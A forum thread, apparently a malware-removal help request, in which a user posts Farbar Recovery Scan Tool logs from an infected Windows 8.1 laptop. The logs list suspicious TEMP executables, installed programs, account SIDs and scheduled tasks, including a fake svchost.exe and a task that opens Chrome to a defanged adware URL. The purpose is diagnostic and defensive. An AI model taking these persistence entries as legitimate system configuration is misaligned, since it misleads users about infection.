    2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
    2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
    2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
    2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
    2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
    2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
    2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
    2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
    2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
    2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
    2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
    2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
    2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

    ==================== Files in the root of some directories =======

    2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
    2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
    2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
    2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
    2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
    2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Files to move or delete:
    ====================
    C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


    Some files in TEMP:
    ====================
    C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
    C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
    C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
    C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
    C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
    C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
    C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
    C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
    C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
    C:\Users\owner\AppData\Local\Temp\amzngtb.exe
    C:\Users\owner\AppData\Local\Temp\avg6A34.exe
    C:\Users\owner\AppData\Local\Temp\avgE955.exe
    C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
    C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
    C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
    C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
    C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
    C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
    C:\Users\owner\AppData\Local\Temp\nsz1850.exe
    C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
    C:\Users\owner\AppData\Local\Temp\setup_766.exe
    C:\Users\owner\AppData\Local\Temp\SpOrder.dll
    C:\Users\owner\AppData\Local\Temp\TranDex.exe
    C:\Users\owner\AppData\Local\Temp\Uninstall.exe
    C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
    C:\Users\owner\AppData\Local\Temp\Vivafind.exe
    C:\Users\owner\AppData\Local\Temp\Voldom.exe
    C:\Users\owner\AppData\Local\Temp\widgett.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

    C:\WINDOWS\SysWOW64\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
     
  16. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Apparently there's more:



    Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
    Ran by owner (2016-01-10 18:14:36)
    Running from E:\
    Windows 8.1 (X64) (2015-01-23 06:44:37)
    Boot Mode: Safe Mode (minimal)
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3773202632-424774445-890114178-500 - Administrator - Disabled)
    Guest (S-1-5-21-3773202632-424774445-890114178-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-3773202632-424774445-890114178-1005 - Limited - Enabled)
    owner (S-1-5-21-3773202632-424774445-890114178-1001 - Administrator - Enabled) => C:\Users\owner

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
    Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation)
    Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
    Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated)
    Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
    Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
    AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
    AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated)
    Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
    Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
    Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
    Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden
    BattleBlock Theater (HKLM-x32\...\Steam App 238460) (Version: - The Behemoth)
    Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
    BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
    Bloody Trapland (HKLM-x32\...\Steam App 257750) (Version: - 2Play)
    Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
    Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
    Broadcom Card Reader Driver Installer (HKLM\...\{F0A7DF2F-0BE0-470F-B137-D7A19F977189}) (Version: 15.4.7.1 - Broadcom Corporation)
    Broforce (HKLM-x32\...\Steam App 274190) (Version: - Free Lives)
    CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
    Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
    Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
    clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3108 - Acer Incorporated)
    clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3108 - Acer Incorporated)
    clear.fi SDK - Video 2 (x32 Version: 2.1.1925 - CyberLink Corp.) Hidden
    clear.fi SDK- Movie 2 (x32 Version: 2.1.2008 - CyberLink Corp.) Hidden
    Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3103_44819 - CyberLink Corp.)
    Delicious: Emily's True Love Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.13 - Dolby Laboratories Inc)
    Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
    eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM)
    ETDWare PS/2-X64 11.6.8.001_WHQL (HKLM\...\Elantech) (Version: 11.6.8.001 - ELAN Microelectronic Corp.)
    Express Zip File Compression (HKLM-x32\...\ExpressZip) (Version: 2.40 - NCH Software)
    Fallout 3 - The Garden of Eden Creation Kit (HKLM-x32\...\{B343B0E3-212A-40B9-8207-1BD299228F5D}) (Version: 1.00.0000 - Bethesda Softworks)
    Fallout 3 (HKLM-x32\...\Steam App 22300) (Version: - Bethesda Game Studios)
    Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
    Gun Monkeys (HKLM-x32\...\Steam App 239450) (Version: - Size Five Games)
    Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
    HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
    HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
    iCloud (HKLM\...\{B33C558F-772F-4308-A059-390FBF9BAAAE}) (Version: 5.0.2.61 - Apple Inc.)
    Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
    Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
    iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
    Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
    Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.5 - Acer Inc.)
    League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
    League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
    Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
    Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3004 - Acer Incorporated)
    Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
    McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
    Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
    Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
    Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
    Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.1 - Mozilla)
    Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
    MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden
    MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden
    MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.)
    MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden
    Network Secured DNS (HKLM-x32\...\Dnsio) (Version: 1.52.0.0 - Network Secured DNS)
    Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 1.1.1 - Nexon)
    NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9008 - NTI Corporation)
    NTI Media Maker 9 (x32 Version: 9.0.2.9008 - NTI Corporation) Hidden
    NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
    Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
    Office Addin 2003 (HKLM-x32\...\{1FCC073B-CC01-4443-AD20-E559F66E6E83}) (Version: 2.01.3200 - Acer)
    One Finger Death Punch (HKLM-x32\...\Steam App 264200) (Version: - Silver Dollar Games)
    Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
    OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
    osu! (HKLM-x32\...\{12d09afc-32f6-4832-997f-7eb4503e4cdc}) (Version: latest - ppy Pty Ltd)
    PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
    Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
    Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.206 - Qualcomm Atheros Communications)
    Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
    QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
    Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
    Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden
    Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
    Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
    Spelunky (HKLM-x32\...\Steam App 239350) (Version: - )
    Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
    TeamSpeak 3 Client (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
    Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
    The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
    The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
    To the Moon (HKLM-x32\...\Steam App 206440) (Version: - Freebird Games)
    Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
    Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
    Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
    Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
    Voxal Voice Changer (HKLM-x32\...\Voxal) (Version: 1.25 - NCH Software)
    Warframe (HKLM-x32\...\Steam App 230410) (Version: - Digital Extremes)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
    WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden
    Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-3773202632-424774445-890114178-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
     
  17. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Last one :)


    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {08E144DB-88C1-4779-A060-554E4829D9D2} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe [2016-01-09] (gltstech.net) <==== ATTENTION
    Task: {11BD7304-492C-4439-9D34-A81068D0C392} - System32\Tasks\RSPro => C:\Users\owner\AppData\Local\SearchModule\dblaunch.exe
    Task: {16528CA3-F849-4C28-B9DC-48BEBB959C9B} - \IBUpd -> No File <==== ATTENTION
    Task: {1A212BEF-CCD3-4085-BB8E-7E2016157EFB} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
    Task: {1A546FC0-FA8F-4CED-A832-6AFCE1A6B2DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
    Task: {1C4B8754-4CCC-4813-BCFA-E1BACF2369AC} - System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Svc Host\svchost.exe [2016-01-09] (Microsoft)
    Task: {22B26FFA-C210-45FC-B7B2-6F1BE8C209B0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
    Task: {23794007-224A-4E7F-9BBD-DF81D69DA5C6} - \Wse_taplika -> No File <==== ATTENTION
    Task: {252A8F75-9B4E-46BC-9DE4-07746515D1B0} - System32\Tasks\GTNU_635879831232953538 => Chrome.exe hxxp://www.5web.co/wapi/tudp.php?fp=3D01-4207-D424-6ED1-6316-4FCF-39D7-0D43&amp;cc=CA
    Task: {285ED968-B027-4E84-89B2-FCAE719FC597} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-07-04] (CyberLink)
    Task: {2973220D-0686-4846-8402-1B6902AB5EE0} - \One System Care Monitor -> No File <==== ATTENTION
    Task: {2D2677DF-ECED-40D3-9494-DEEFF6DFCBA8} - System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837 => 50000
    Task: {2EE58792-0DF1-43F3-8876-01F8D027EEC0} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
    Task: {32179E0D-7013-4B23-A43B-8382F890FECB} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-29] ()
    Task: {3334EB49-C86F-45BD-8145-728921B1AE75} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
    Task: {3AF24C5B-AA9E-400C-9823-0632119078A6} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: {3AFE7DCE-A37F-406C-8FF9-4C2024106030} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
    Task: {43344108-F38A-47C2-8354-25FF3F9A5E00} - System32\Tasks\IBUpd2 => C:\Users\owner\AppData\Local\BrowserAir\47.0.0.3\updater.exe
    Task: {4483CAD1-273A-460E-BCD1-7528ABC6361C} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
    Task: {49E18F13-C232-46E5-B2B9-CB9A6B05EDAF} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
    Task: {4B4EA442-4CBE-431C-A8F1-9A6A94D2A2C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main => 50000,1
